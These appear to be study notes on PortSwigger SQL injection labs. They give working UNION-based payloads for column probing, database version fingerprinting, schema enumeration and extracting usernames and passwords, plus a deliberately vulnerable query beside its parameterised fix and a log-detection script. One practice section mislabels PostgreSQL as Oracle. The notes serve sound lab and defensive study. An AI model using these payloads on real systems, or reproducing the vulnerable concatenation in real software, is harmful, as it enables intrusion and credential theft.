PortSwigger SQL
Returns all the items from the products table (the -- comments out the released = 1 condition):
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
Union Select
Query example:
Step 1: How many NULLs do you need before it breaks? If it breaks, that means you need to remove the last NULL.
Step 2: Try inserting random text like 'a' in place of each NULL and see when it outputs the typed text.
Step 3: Now that we have found where the string data resides, we can try to extract valid data.
Use Burp Suite to intercept and modify the request that sets the product category filter.
Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, only one of which contains text, using a payload like the following in the category parameter:
'+UNION+SELECT+NULL,'abc'--
Use the following payload to retrieve the contents of the users table:
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Verify that the application's response contains usernames and passwords.
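The concatenation bug behind these payloads, shown beside the parameterised fix, as an added example that is neither these notes' nor PortSwigger's code. It uses Python's built-in sqlite3 with a constructed in-memory products table whose column names are assumed to mirror the lab; the two payloads are the ones from the notes above, and SQLite treats -- and UNION the same way as the lab's database does.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the lab's products table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    con.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [
            ("Mug", "Gifts", 1),
            ("Secret gift", "Gifts", 0),  # unreleased: must never be shown
            ("Lamp", "Home", 1),
        ],
    )
    return con


def filter_products_vulnerable(con: sqlite3.Connection, category: str) -> list:
    """The bug: user input is spliced into the SQL text. A quote in the input
    closes the string literal and everything after it is parsed as SQL, so
    -- comments out the released = 1 condition and UNION SELECT appends
    attacker-chosen rows."""
    sql = (
        "SELECT name, category FROM products WHERE category = '"
        + category
        + "' AND released = 1"
    )
    return con.execute(sql).fetchall()


def filter_products_fixed(con: sqlite3.Connection, category: str) -> list:
    """The fix: a parameterised query. The driver sends the value separately
    from the statement, so quotes, comments and UNION in the input are just
    characters of a category name that matches nothing."""
    sql = "SELECT name, category FROM products WHERE category = ? AND released = 1"
    return con.execute(sql, (category,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    for payload in ("Gifts", "Gifts' OR 1=1--", "' UNION SELECT NULL,'abc'--"):
        print(repr(payload))
        print("  vulnerable:", filter_products_vulnerable(con, payload))
        print("  fixed:     ", filter_products_fixed(con, payload))
```

Run it and the vulnerable filter returns the unreleased row for Gifts' OR 1=1-- and an attacker-chosen row for the UNION payload, while the parameterised version returns only the released Gifts row or nothing at all. The "break" in Step 1 above is a database error raised for a mismatched column count; with the parameterised query there is no such error to observe, and the application should in any case log database errors rather than echo them to the client.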
Examining the database in SQL
Database type | Query
---|---
Microsoft, MySQL | SELECT @@version
Oracle | SELECT banner FROM v$version
PostgreSQL | SELECT version()
For example, you could use a UNION attack with the following input:
' UNION SELECT @@version--
On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name.
There is a built-in table on Oracle called dual which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual
1. Use the cheat sheet.
2. Find how many NULLs it can take.
3. Find which ones can handle text.
4. Put banner in one of the text-enabled fields and change dual to v$version.
MySQL and Microsoft version
Open Burp and start intercepting traffic.
1. Determine how many NULLs: 2.
2. Determine which column can take a string pattern: 'a','b'#
Both can take it!
3. Use the cheat sheet to construct the payload for the version.
Examining the database in SQL injection attacks
When exploiting SQL injection vulnerabilities, it is often necessary to gather some information about the database itself. This includes the type and version of the database software, and the contents of the database in terms of which tables and columns it contains.
Listing the contents of the database
Most database types (with the notable exception of Oracle) have a set of views called the information schema which provide information about the database.
You can query information_schema.tables to list the tables in the database:
SELECT * FROM information_schema.tables
This returns output like the following:
TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE
---|---|---|---
MyDatabase | dbo | Products | BASE TABLE
MyDatabase | dbo | Users | BASE TABLE
MyDatabase | dbo | Feedback | BASE TABLE
This output indicates that there are three tables, called Products, Users, and Feedback.
You can then query information_schema.columns to list the columns in individual tables:
SELECT * FROM information_schema.columns WHERE table_name = 'Users'
Practice:
Database = Oracle (takes -- as comment)
1. Determine the version: PostgreSQL 11.15 (Debian 11.15-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit
Payload: 'UNION SELECT version(), NULL--
2. NULLs: it can take 2, and both take strings.
3. PostgreSQL uses information_schema for database metadata.
4. What table names does it use? Google "information_schema PostgreSQL". Use
'UNION SELECT table_name, NULL FROM information_schema.tables--
to determine table names. Username table found.
5. Column names can be found with column_name.
6. Finally, extract username and password with
'UNION SELECT username_fqsrrh, password_gnbogm FROM users_pdklkk--
Equivalent to information schema on Oracle
On Oracle, you can obtain the same information with slightly different queries.
You can list tables by querying all_tables:
SELECT * FROM all_tables
And you can list columns by querying all_tab_columns:
SELECT * FROM all_tab_columns WHERE table_name = 'USERS'
1. 'UNION SELECT NULL,NULL FROM dual-- (two outputs)
2. Show table names:
USER$
USERS_EWFXQA
3. Retrieve column names.
4. Retrieve username and password.
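The other side of the enumeration steps above (version fingerprinting, information_schema and the Oracle all_tables / v$version equivalents): a small log triage script that flags requests whose parameters carry these probes. This is an added example written for these notes, not code from PortSwigger or the labs. The access-log lines are constructed, the /filter?category= endpoint is assumed to match the lab, and the indicator patterns are built from the payloads used in the notes.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures for the probing steps in the notes: the UNION SELECT itself,
# NULL column-count probes, the OR 1=1 tautology, version fingerprinting for
# MySQL/MSSQL, PostgreSQL and Oracle, schema enumeration, and the comment
# terminators (-- and #) used to discard the rest of the original query.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "null_probe": re.compile(r"\bnull\b", re.I),
    "tautology": re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)|v\$version", re.I),
    "schema_enum": re.compile(
        r"information_schema\.(?:tables|columns)|\ball_tables\b|\ball_tab_columns\b",
        re.I,
    ),
    "comment_terminator": re.compile(r"--|#\s*$"),
}

# Request target of a Common Log Format line, e.g. "GET /filter?category=x HTTP/1.1".
LOG_LINE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_params(target: str) -> dict:
    """URL-decode every query parameter of a request target and return
    {param: [matched indicator names]} for the parameters that match."""
    findings = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits = [ind for ind, rx in INDICATORS.items() if rx.search(value)]
        if hits:
            findings[name] = hits
    return findings


def scan_log(lines) -> list:
    """Return (line_number, parameter, indicators) for each request that looks
    like a union-based injection probe. A lone NULL or comment marker is not
    enough on its own (they occur in legitimate input); it must co-occur with
    a UNION SELECT, a tautology, a version probe or a schema lookup."""
    strong = {"union_select", "tautology", "version_probe", "schema_enum"}
    alerts = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.search(line)
        if not m:
            continue
        for param, hits in inspect_params(m.group("target")).items():
            if strong & set(hits):
                alerts.append((n, param, hits))
    return alerts


# Constructed access-log lines; the encoded payloads are the ones from these notes.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /filter?category=Gifts HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /filter?category=Gifts%27+OR+1%3D1-- HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /filter?category=%27+UNION+SELECT+NULL%2C%27abc%27-- HTTP/1.1" 200 700',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /filter?category=%27+UNION+SELECT+version()%2C+NULL-- HTTP/1.1" 200 800',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /filter?category=%27+UNION+SELECT+table_name%2C+NULL+FROM+information_schema.tables-- HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /filter?category=Home+%26+Garden HTTP/1.1" 200 400',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Lines 2 to 5 are flagged and lines 1 and 6 (plain categories, including one with an encoded ampersand) are not. Signature matching like this is a triage aid for spotting the column-count and schema walk in hindsight, not a control: the fix remains parameterised queries and a database account that cannot read other schemas' metadata.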